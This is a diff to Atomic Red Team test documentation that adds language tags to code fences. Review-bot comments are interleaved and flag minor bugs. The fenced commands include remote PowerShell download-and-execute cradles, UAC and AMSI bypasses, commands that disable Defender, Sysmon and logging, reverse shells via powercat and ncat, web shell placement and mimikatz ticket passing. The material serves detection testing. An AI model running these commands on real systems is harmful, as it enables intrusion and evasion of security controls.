@@ -145,7 +153,9 @@ Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-pat #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'" ``` @@ -173,7 +183,9 @@ Using PS 5.1, add a user via CLI #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}' ``` @@ -200,7 +212,9 @@ Not proxy aware removing cache although does not appear to write to those locati #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" ``` @@ -227,7 +241,9 @@ Not proxy aware removing cache although does not appear to write to those locati #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" ``` @@ -253,7 +269,9 @@ Powershell xml download request #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX" ``` @@ -279,7 +297,9 @@ Powershell invoke mshta to download payload #### Attack Commands: Run with `powershell`! -``` + + +```powershell "C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()" ``` 
@@ -319,14 +339,16 @@ Execution of a PowerShell payload from the Windows Registry similar to that seen #### Attack Commands: Run with `powershell`! -``` + + +```powershell # Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team"" reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART))) ``` #### Cleanup Commands: -``` +```powershell cmd /c del /Q /F %SystemRoot%\Temp\art-marker.txt cmd /c REG DELETE "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /f ``` @@ -346,20 +368,23 @@ Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blo #### Attack Commands: Run with `powershell`! -``` + + +```powershell powershell.exe -version 2 -Command Write-Host $PSVersion ``` + #### Dependencies: Run with `powershell`! ##### Description: PowerShell version 2 must be installed ##### Check Prereq Commands: -``` +```powershell if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell Write-Host Automated installer not implemented yet, please install PowerShell v2 manually ``` 
@@ -382,26 +407,29 @@ Creates a file with an alternate data stream and simulates executing that hidden #### Attack Commands: Run with `powershell`! -``` + + +```powershell Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand' $streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand' Invoke-Expression $streamcommand ``` #### Cleanup Commands: -``` +```powershell Remove-Item #{ads_file} -Force -ErrorAction Ignore ``` + #### Dependencies: Run with `powershell`! ##### Description: Homedrive must be an NTFS drive ##### Check Prereq Commands: -``` +```powershell if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell Write-Host Prereq's for this test cannot be met automatically ``` diff --git a/atomics/T1087/T1087.md b/atomics/T1087/T1087.md index 470d30e8..fba2d09e 100644 --- a/atomics/T1087/T1087.md +++ b/atomics/T1087/T1087.md @@ -64,7 +64,9 @@ Enumerate all accounts by copying /etc/passwd to another file #### Attack Commands: Run with `sh`! -``` + + +```sh cat /etc/passwd > #{output_file} ``` @@ -89,7 +91,9 @@ cat /etc/passwd > #{output_file} #### Attack Commands: Run with `sh`! -``` + + +```sh cat /etc/sudoers > #{output_file} ``` @@ -114,7 +118,9 @@ View accounts wtih UID 0 #### Attack Commands: Run with `sh`! -``` + + +```sh grep 'x:0:' /etc/passwd > #{output_file} ``` @@ -134,7 +140,9 @@ List opened files by user #### Attack Commands: Run with `sh`! -``` + + +```sh username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username ``` @@ -159,7 +167,9 @@ Show if a user account has ever logged in remotely #### Attack Commands: Run with `sh`! -``` + + +```sh lastlog > #{output_file} ``` @@ -179,7 +189,9 @@ Utilize groups and id to enumerate users and groups #### Attack Commands: Run with `sh`! -``` + + +```sh groups id ``` 
@@ -200,7 +212,9 @@ Utilize local utilities to enumerate users and groups #### Attack Commands: Run with `sh`! -``` + + +```sh dscl . list /Groups dscl . list /Users dscl . list /Users | grep -v '_' @@ -224,7 +238,9 @@ Enumerate all accounts #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd net user net user /domain dir c:\Users\ @@ -249,7 +265,9 @@ Enumerate all accounts via PowerShell #### Attack Commands: Run with `powershell`! -``` + + +```powershell net user net user /domain get-localuser @@ -279,7 +297,9 @@ Enumerate logged on users #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd query user ``` @@ -299,7 +319,9 @@ Enumerate logged on users via PowerShell #### Attack Commands: Run with `powershell`! -``` + + +```powershell query user ``` diff --git a/atomics/T1088/T1088.md b/atomics/T1088/T1088.md index 60944e84..6e4516c8 100644 --- a/atomics/T1088/T1088.md +++ b/atomics/T1088/T1088.md @@ -40,13 +40,15 @@ Bypasses User Account Control using Event Viewer and a relevant Windows Registry #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f cmd.exe /c eventvwr.msc ``` #### Cleanup Commands: -``` +```cmd reg.exe delete hkcu\software\classes\mscfile /f ``` @@ -70,14 +72,16 @@ PowerShell code to bypass User Account Control using Event Viewer and a relevant #### Attack Commands: Run with `powershell`! -``` + + +```powershell New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force Start-Process "C:\Windows\System32\eventvwr.msc" ``` #### Cleanup Commands: -``` +```powershell Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore ``` 
@@ -101,14 +105,16 @@ Bypasses User Account Control using the Windows 10 Features on Demand Helper (fo #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" fodhelper.exe ``` #### Cleanup Commands: -``` +```cmd reg.exe delete hkcu\software\classes\ms-settings /f ``` @@ -132,7 +138,9 @@ PowerShell code to bypass User Account Control using the Windows 10 Features on #### Attack Commands: Run with `powershell`! -``` + + +```powershell New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force @@ -140,7 +148,7 @@ Start-Process "C:\Windows\System32\fodhelper.exe" ``` #### Cleanup Commands: -``` +```powershell Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore ``` @@ -164,7 +172,9 @@ PowerShell code to bypass User Account Control using ComputerDefaults.exe on Win #### Attack Commands: Run with `powershell`! -``` + + +```powershell New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force @@ -172,7 +182,7 @@ Start-Process "C:\Windows\System32\ComputerDefaults.exe" ``` #### Cleanup Commands: -``` +```powershell Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore ``` 
@@ -196,14 +206,16 @@ Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC by #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd mkdir "\\?\C:\Windows \System32\" copy "#{executable_binary}" "\\?\C:\Windows \System32\mmc.exe" mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe" ``` #### Cleanup Commands: -``` +```cmd rd "\\?\C:\Windows \" /S /Q del "c:\testbypass.exe" >nul 2>nul ``` diff --git a/atomics/T1089/T1089.md b/atomics/T1089/T1089.md index 54708cfd..3908f7b3 100644 --- a/atomics/T1089/T1089.md +++ b/atomics/T1089/T1089.md @@ -55,7 +55,9 @@ Disables the iptables firewall #### Attack Commands: Run with `sh`! -``` + + +```sh if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; then service iptables stop @@ -84,7 +86,9 @@ Disables syslog collection #### Attack Commands: Run with `sh`! -``` + + +```sh if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; then service rsyslog stop @@ -111,7 +115,9 @@ Disable the Cb Response service #### Attack Commands: Run with `sh`! -``` + + +```sh if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; then service cbdaemon stop @@ -138,7 +144,9 @@ Disables SELinux enforcement #### Attack Commands: Run with `sh`! -``` + + +```sh setenforce 0 ``` @@ -158,7 +166,9 @@ Disables Carbon Black Response #### Attack Commands: Run with `sh`! -``` + + +```sh sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist ``` @@ -178,7 +188,9 @@ Disables LittleSnitch #### Attack Commands: Run with `sh`! -``` + + +```sh sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist ``` @@ -198,7 +210,9 @@ Disables OpenDNS Umbrella #### Attack Commands: Run with `sh`! -``` + + +```sh sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist ``` 
@@ -223,26 +237,29 @@ Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon servic #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd fltmc.exe unload #{sysmon_driver} ``` #### Cleanup Commands: -``` +```cmd sc stop sysmon fltmc.exe load #{sysmon_driver} sc start sysmon ``` + #### Dependencies: Run with `command_prompt`! ##### Description: Sysmon filter must be loaded ##### Check Prereq Commands: -``` +```cmd fltmc.exe filters | findstr #{sysmon_driver} ``` ##### Get Prereq Commands: -``` +```cmd echo Automated installer not implemented yet, please install Sysmon manually ``` @@ -266,12 +283,14 @@ This action requires HTTP logging configurations in IIS to be unlocked. #### Attack Commands: Run with `powershell`! -``` + + +```powershell C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true ``` #### Cleanup Commands: -``` +```powershell C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false ``` @@ -295,24 +314,27 @@ Uninstall Sysinternals Sysmon for Defense Evasion #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd sysmon -u ``` #### Cleanup Commands: -``` +```cmd sysmon -i -accepteula ``` + #### Dependencies: Run with `powershell`! ##### Description: Sysmon executable must be available ##### Check Prereq Commands: -``` +```powershell if(cmd /c where sysmon) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell $parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip" New-Item -ItemType Directory $parentpath -Force | Out-Null Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath" 
@@ -321,11 +343,11 @@ if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"} ``` ##### Description: Sysmon must be installed ##### Check Prereq Commands: -``` +```powershell if(cmd /c sc query sysmon) { exit 0} else { exit 1} ``` ##### Get Prereq Commands: -``` +```powershell cmd /c sysmon -i -accepteula ``` @@ -344,12 +366,14 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ #### Attack Commands: Run with `powershell`! -``` + + +```powershell [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) ``` #### Cleanup Commands: -``` +```powershell [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false) ``` @@ -369,12 +393,14 @@ This test removes the Windows Defender provider registry key. #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse ``` #### Cleanup Commands: -``` +```powershell New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" ``` @@ -398,13 +424,15 @@ With administrative rights, an adversary can disable Windows Services related to #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd net.exe stop #{service_name} sc.exe config #{service_name} start= disabled ``` #### Cleanup Commands: -``` +```cmd sc.exe config #{service_name} start= auto net.exe start #{service_name} ``` 
@@ -426,7 +454,9 @@ Credit to Matt Graeber (@mattifestation) for the research. #### Attack Commands: Run with `powershell`! -``` + + +```powershell $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static') $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null) $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0 @@ -434,7 +464,7 @@ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] ``` #### Cleanup Commands: -``` +```powershell $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static') $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null) $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1 @@ -458,7 +488,9 @@ Credit to Matt Graeber (@mattifestation) for the research. #### Attack Commands: Run with `powershell`! -``` + + +```powershell [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) ``` @@ -478,7 +510,9 @@ Attempting to disable scheduled scanning and other parts of windows defender atp #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell Set-MpPreference -DisableRealtimeMonitoring 1 Set-MpPreference -DisableBehaviorMonitoring 1 Set-MpPreference -DisableScriptScanning 1 @@ -486,7 +520,7 @@ Set-MpPreference -DisableBlockAtFirstSeen 1 ``` #### Cleanup Commands: -``` +```powershell Set-MpPreference -DisableRealtimeMonitoring 0 Set-MpPreference -DisableBehaviorMonitoring 0 Set-MpPreference -DisableScriptScanning 0 
@@ -508,14 +542,16 @@ Attempting to disable scheduled scanning and other parts of windows defender atp #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd sc stop WinDefend sc config WinDefend start=disabled sc query WinDefend ``` #### Cleanup Commands: -``` +```cmd sc start WinDefend sc config WinDefend start=enabled ``` @@ -535,12 +571,14 @@ Disable Windows Defender from starting after a reboot #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 ``` #### Cleanup Commands: -``` +```powershell Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 ``` @@ -560,7 +598,9 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state- #### Attack Commands: Run with `powershell`! -``` + + +```powershell New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel" New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" @@ -571,7 +611,7 @@ New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\Prot ``` #### Cleanup Commands: -``` +```powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" ``` @@ -593,7 +633,9 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state- #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All ``` diff --git a/atomics/T1090/T1090.md b/atomics/T1090/T1090.md index 4f4e0c25..ed7d485b 100644 --- a/atomics/T1090/T1090.md +++ b/atomics/T1090/T1090.md 
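Review bot: in the `@@ -508,14 +542,16 @@` hunk of atomics/T1089/T1089.md the newly fenced commands are `sc config WinDefend start=disabled` and `sc config WinDefend start=enabled`; sc.exe's option parser wants a space after the `=` (`start= disabled`), which the earlier hunk in the same file already uses (`sc.exe config #{service_name} start= disabled`). Without the space the call errors out instead of changing the start type, so the cleanup in particular would not re-enable the service. The fix belongs in the atomic YAML, and regenerating the doc afterwards would keep this PR's fences intact.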
@@ -31,12 +31,14 @@ Note that this test may conflict with pre-existing system configuration. #### Attack Commands: Run with `sh`! -``` + + +```sh export #{proxy_scheme}_proxy=#{proxy_server} ``` #### Cleanup Commands: -``` +```sh unset http_proxy unset https_proxy ``` @@ -64,12 +66,14 @@ HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=#{connectport} connectaddress=#{connectaddress} ``` #### Cleanup Commands: -``` +```powershell netsh interface portproxy delete v4tov4 listenport=#{listenport} ``` diff --git a/atomics/T1093/T1093.md b/atomics/T1093/T1093.md index ebec4674..53a90c03 100644 --- a/atomics/T1093/T1093.md +++ b/atomics/T1093/T1093.md @@ -26,14 +26,16 @@ Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/ #### Attack Commands: Run with `powershell`! -``` + + +```powershell . $PathToAtomicsFolder\T1093\src\Start-Hollow.ps1 $ppid=Get-Process #{parent_process_name} | select -expand id Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose ``` #### Cleanup Commands: -``` +```powershell Stop-Process -Name "#{spawnto_process_name}" ``` diff --git a/atomics/T1095/T1095.md b/atomics/T1095/T1095.md index f8a02dce..e45be7d2 100644 --- a/atomics/T1095/T1095.md +++ b/atomics/T1095/T1095.md @@ -29,7 +29,9 @@ refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-ic #### Attack Commands: Run with `powershell`! -``` + + +```powershell IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1') Invoke-PowerShellIcmp -IPAddress #{server_ip} ``` 
@@ -60,20 +62,23 @@ nc -l -p #### Attack Commands: Run with `powershell`! -``` + + +```powershell cmd /c #{ncat_exe} #{server_ip} #{server_port} ``` + #### Dependencies: Run with `powerShell`! ##### Description: ncat.exe must be available at specified location (#{ncat_exe}) ##### Check Prereq Commands: -``` +```powerShell if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powerShell New-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null $parentpath = Split-Path (Split-Path "#{ncat_exe}"); $zippath = "$parentpath\nmap.zip" Invoke-WebRequest "https://nmap.org/dist/nmap-7.80-win32.zip" -OutFile "$zippath" @@ -106,7 +111,9 @@ nc -l -p #### Attack Commands: Run with `powershell`! -``` + + +```powershell IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1') powercat -c #{server_ip} -p #{server_port} ``` diff --git a/atomics/T1096/T1096.md b/atomics/T1096/T1096.md index 42dceb15..61867a50 100644 --- a/atomics/T1096/T1096.md +++ b/atomics/T1096/T1096.md @@ -30,7 +30,9 @@ Execute from Alternate Streams #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe findstr /V /L W3AllLov3DonaldTrump #{path}\procexp.exe > #{path}\file.txt:procexp.exe @@ -66,7 +68,9 @@ Storing files in Alternate Data Stream (ADS) similar to Astaroth malware. #### Attack Commands: Run with `powershell`! -``` + + +```powershell if (!(Test-Path C:\Users\Public\Libraries\yanki -PathType Container)) { New-Item -ItemType Directory -Force -Path C:\Users\Public\Libraries\yanki } 
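Review bot: in the `@@ -60,20 +62,23 @@` hunk of atomics/T1095/T1095.md the dependency fences come out as `+```powerShell` (capital S), copied verbatim from "Run with `powerShell`!", while the attack block in the same hunk is `+```powershell`. The template evidently passes the executor name straight through as the fence info string, so the casing should be normalised in the T1095 YAML (`powershell`) and the doc regenerated; any renderer or linter that matches the info string case-sensitively will otherwise treat the two blocks differently.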
@@ -74,7 +78,7 @@ Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>, ``` #### Cleanup Commands: -``` +```powershell Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore ``` diff --git a/atomics/T1097/T1097.md b/atomics/T1097/T1097.md index 26d98bb9..13c7483c 100644 --- a/atomics/T1097/T1097.md +++ b/atomics/T1097/T1097.md @@ -29,7 +29,9 @@ Similar to PTH, but attacking Kerberos #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd mimikatz # kerberos::ptt #{user_name}@#{domain} ``` diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md index f9917fa6..46bbb302 100644 --- a/atomics/T1098/T1098.md +++ b/atomics/T1098/T1098.md @@ -29,7 +29,9 @@ Manipulate Admin Account Name #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell $x = Get-Random -Minimum 2 -Maximum 9999 $y = Get-Random -Minimum 2 -Maximum 9999 $z = Get-Random -Minimum 2 -Maximum 9999 diff --git a/atomics/T1099/T1099.md b/atomics/T1099/T1099.md index 63bfc6d2..3225baf2 100644 --- a/atomics/T1099/T1099.md +++ b/atomics/T1099/T1099.md @@ -34,7 +34,9 @@ Stomps on the access timestamp of a file #### Attack Commands: Run with `sh`! -``` + + +```sh touch -a -t 197001010000.00 #{target_filename} ``` @@ -59,7 +61,9 @@ Stomps on the modification timestamp of a file #### Attack Commands: Run with `sh`! -``` + + +```sh touch -m -t 197001010000.00 #{target_filename} ``` @@ -87,7 +91,9 @@ Sudo or root privileges are required to change date. Use with caution. #### Attack Commands: Run with `sh`! -``` + + +```sh NOW=$(date) date -s "1970-01-01 00:00:00" touch #{target_filename} @@ -119,7 +125,9 @@ This technique was used by the threat actor Rocke during the compromise of Linux #### Attack Commands: Run with `sh`! -``` + + +```sh touch -acmr #{reference_file_path} {target_file_path} ``` 
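Review bot: the `@@ -119,7 +125,9 @@` hunk in atomics/T1099/T1099.md fences `touch -acmr #{reference_file_path} {target_file_path}`, and the second argument is missing the `#` of the `#{...}` input-argument syntax. The executor will not substitute it, so touch receives the literal path `{target_file_path}` and creates a new file of that name instead of stomping the intended target. Worth fixing in the YAML (`#{target_file_path}`) while the docs are being regenerated anyway.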
@@ -147,7 +155,9 @@ This technique was seen in use by the Stitch RAT. #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd powershell.exe Get-ChildItem #{file_path} | % { $_.CreationTime = #{target_date_time} } ``` @@ -175,7 +185,9 @@ This technique was seen in use by the Stitch RAT. #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd powershell.exe Get-ChildItem #{file_path} | % { $_.LastWriteTime = #{target_date_time} } ``` @@ -203,7 +215,9 @@ This technique was seen in use by the Stitch RAT. #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd powershell.exe Get-ChildItem #{file_path} | % { $_.LastAccessTime = #{target_date_time} } ``` diff --git a/atomics/T1100/T1100.md b/atomics/T1100/T1100.md index 0d8eac36..50e363a6 100644 --- a/atomics/T1100/T1100.md +++ b/atomics/T1100/T1100.md @@ -27,24 +27,27 @@ cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/ #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd xcopy #{web_shells} #{web_shell_path} ``` #### Cleanup Commands: -``` +```cmd del #{web_shell_path} >nul 2>&1 ``` + #### Dependencies: Run with `powershell`! ##### Description: Web shell must exist on disk at specified location (#{web_shells}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{web_shells}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/b.jsp" -OutFile "#{web_shells}/b.jsp" Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/tests.jsp" -OutFile "#{web_shells}/test.jsp" diff --git a/atomics/T1101/T1101.md b/atomics/T1101/T1101.md index 69bee7c9..6373d0bc 100644 --- a/atomics/T1101/T1101.md +++ b/atomics/T1101/T1101.md 
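Review bot: in the `@@ -27,24 +27,27 @@` hunk of atomics/T1100/T1100.md the get-prereq command fetches `.../atomics/T1100/src/tests.jsp` but writes it to `#{web_shells}/test.jsp`, so the source and destination names disagree (`tests` vs `test`). Please confirm which name the src directory actually carries; if the URL is wrong the Invoke-WebRequest fails and the dependency is never satisfied.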
@@ -22,7 +22,9 @@ Add a value to a Windows registry SSP key, simulating an adversarial modificatio #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell # run these in sequence $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages' $SecurityPackagesUpdated = $SecurityPackages diff --git a/atomics/T1102/T1102.md b/atomics/T1102/T1102.md index 889559e3..703ef59a 100644 --- a/atomics/T1102/T1102.md +++ b/atomics/T1102/T1102.md @@ -25,12 +25,14 @@ Download data from a public website using command line #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd bitsadmin.exe /transfer "DonwloadFile" http://www.stealmylogin.com/ %TEMP%\bitsadmindownload.html ``` #### Cleanup Commands: -``` +```cmd del %TEMP%\bitsadmindownload.html >nul 2>&1 ``` @@ -49,7 +51,9 @@ Multiple download methods for files using powershell #### Attack Commands: Run with `powershell`! -``` + + +```powershell Invoke-WebRequest -Uri www.twitter.com $T1102 = (New-Object System.Net.WebClient).DownloadData("https://www.reddit.com/") $wc = New-Object System.Net.WebClient @@ -57,7 +61,7 @@ $T1102 = $wc.DownloadString("https://www.aol.com/") ``` #### Cleanup Commands: -``` +```powershell Clear-Variable T1102 >$null 2>&1 ``` diff --git a/atomics/T1103/T1103.md b/atomics/T1103/T1103.md index 8f4cbcae..a6fa26b7 100644 --- a/atomics/T1103/T1103.md +++ b/atomics/T1103/T1103.md @@ -24,7 +24,9 @@ AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded i #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd reg.exe import #{registry_file} ``` diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md index 3ba539ac..a6343770 100644 --- a/atomics/T1105/T1105.md +++ b/atomics/T1105/T1105.md 
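Review bot: the `@@ -25,12 +25,14 @@` hunk of atomics/T1102/T1102.md fences `bitsadmin.exe /transfer "DonwloadFile" ...`, which carries a typo in the BITS job name ("DonwloadFile"). It does not affect the transfer, but the job name is what surfaces in `bitsadmin /list` and BITS client event logs, so anyone building a detection from this doc will copy the misspelling; a one-word fix in the YAML.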
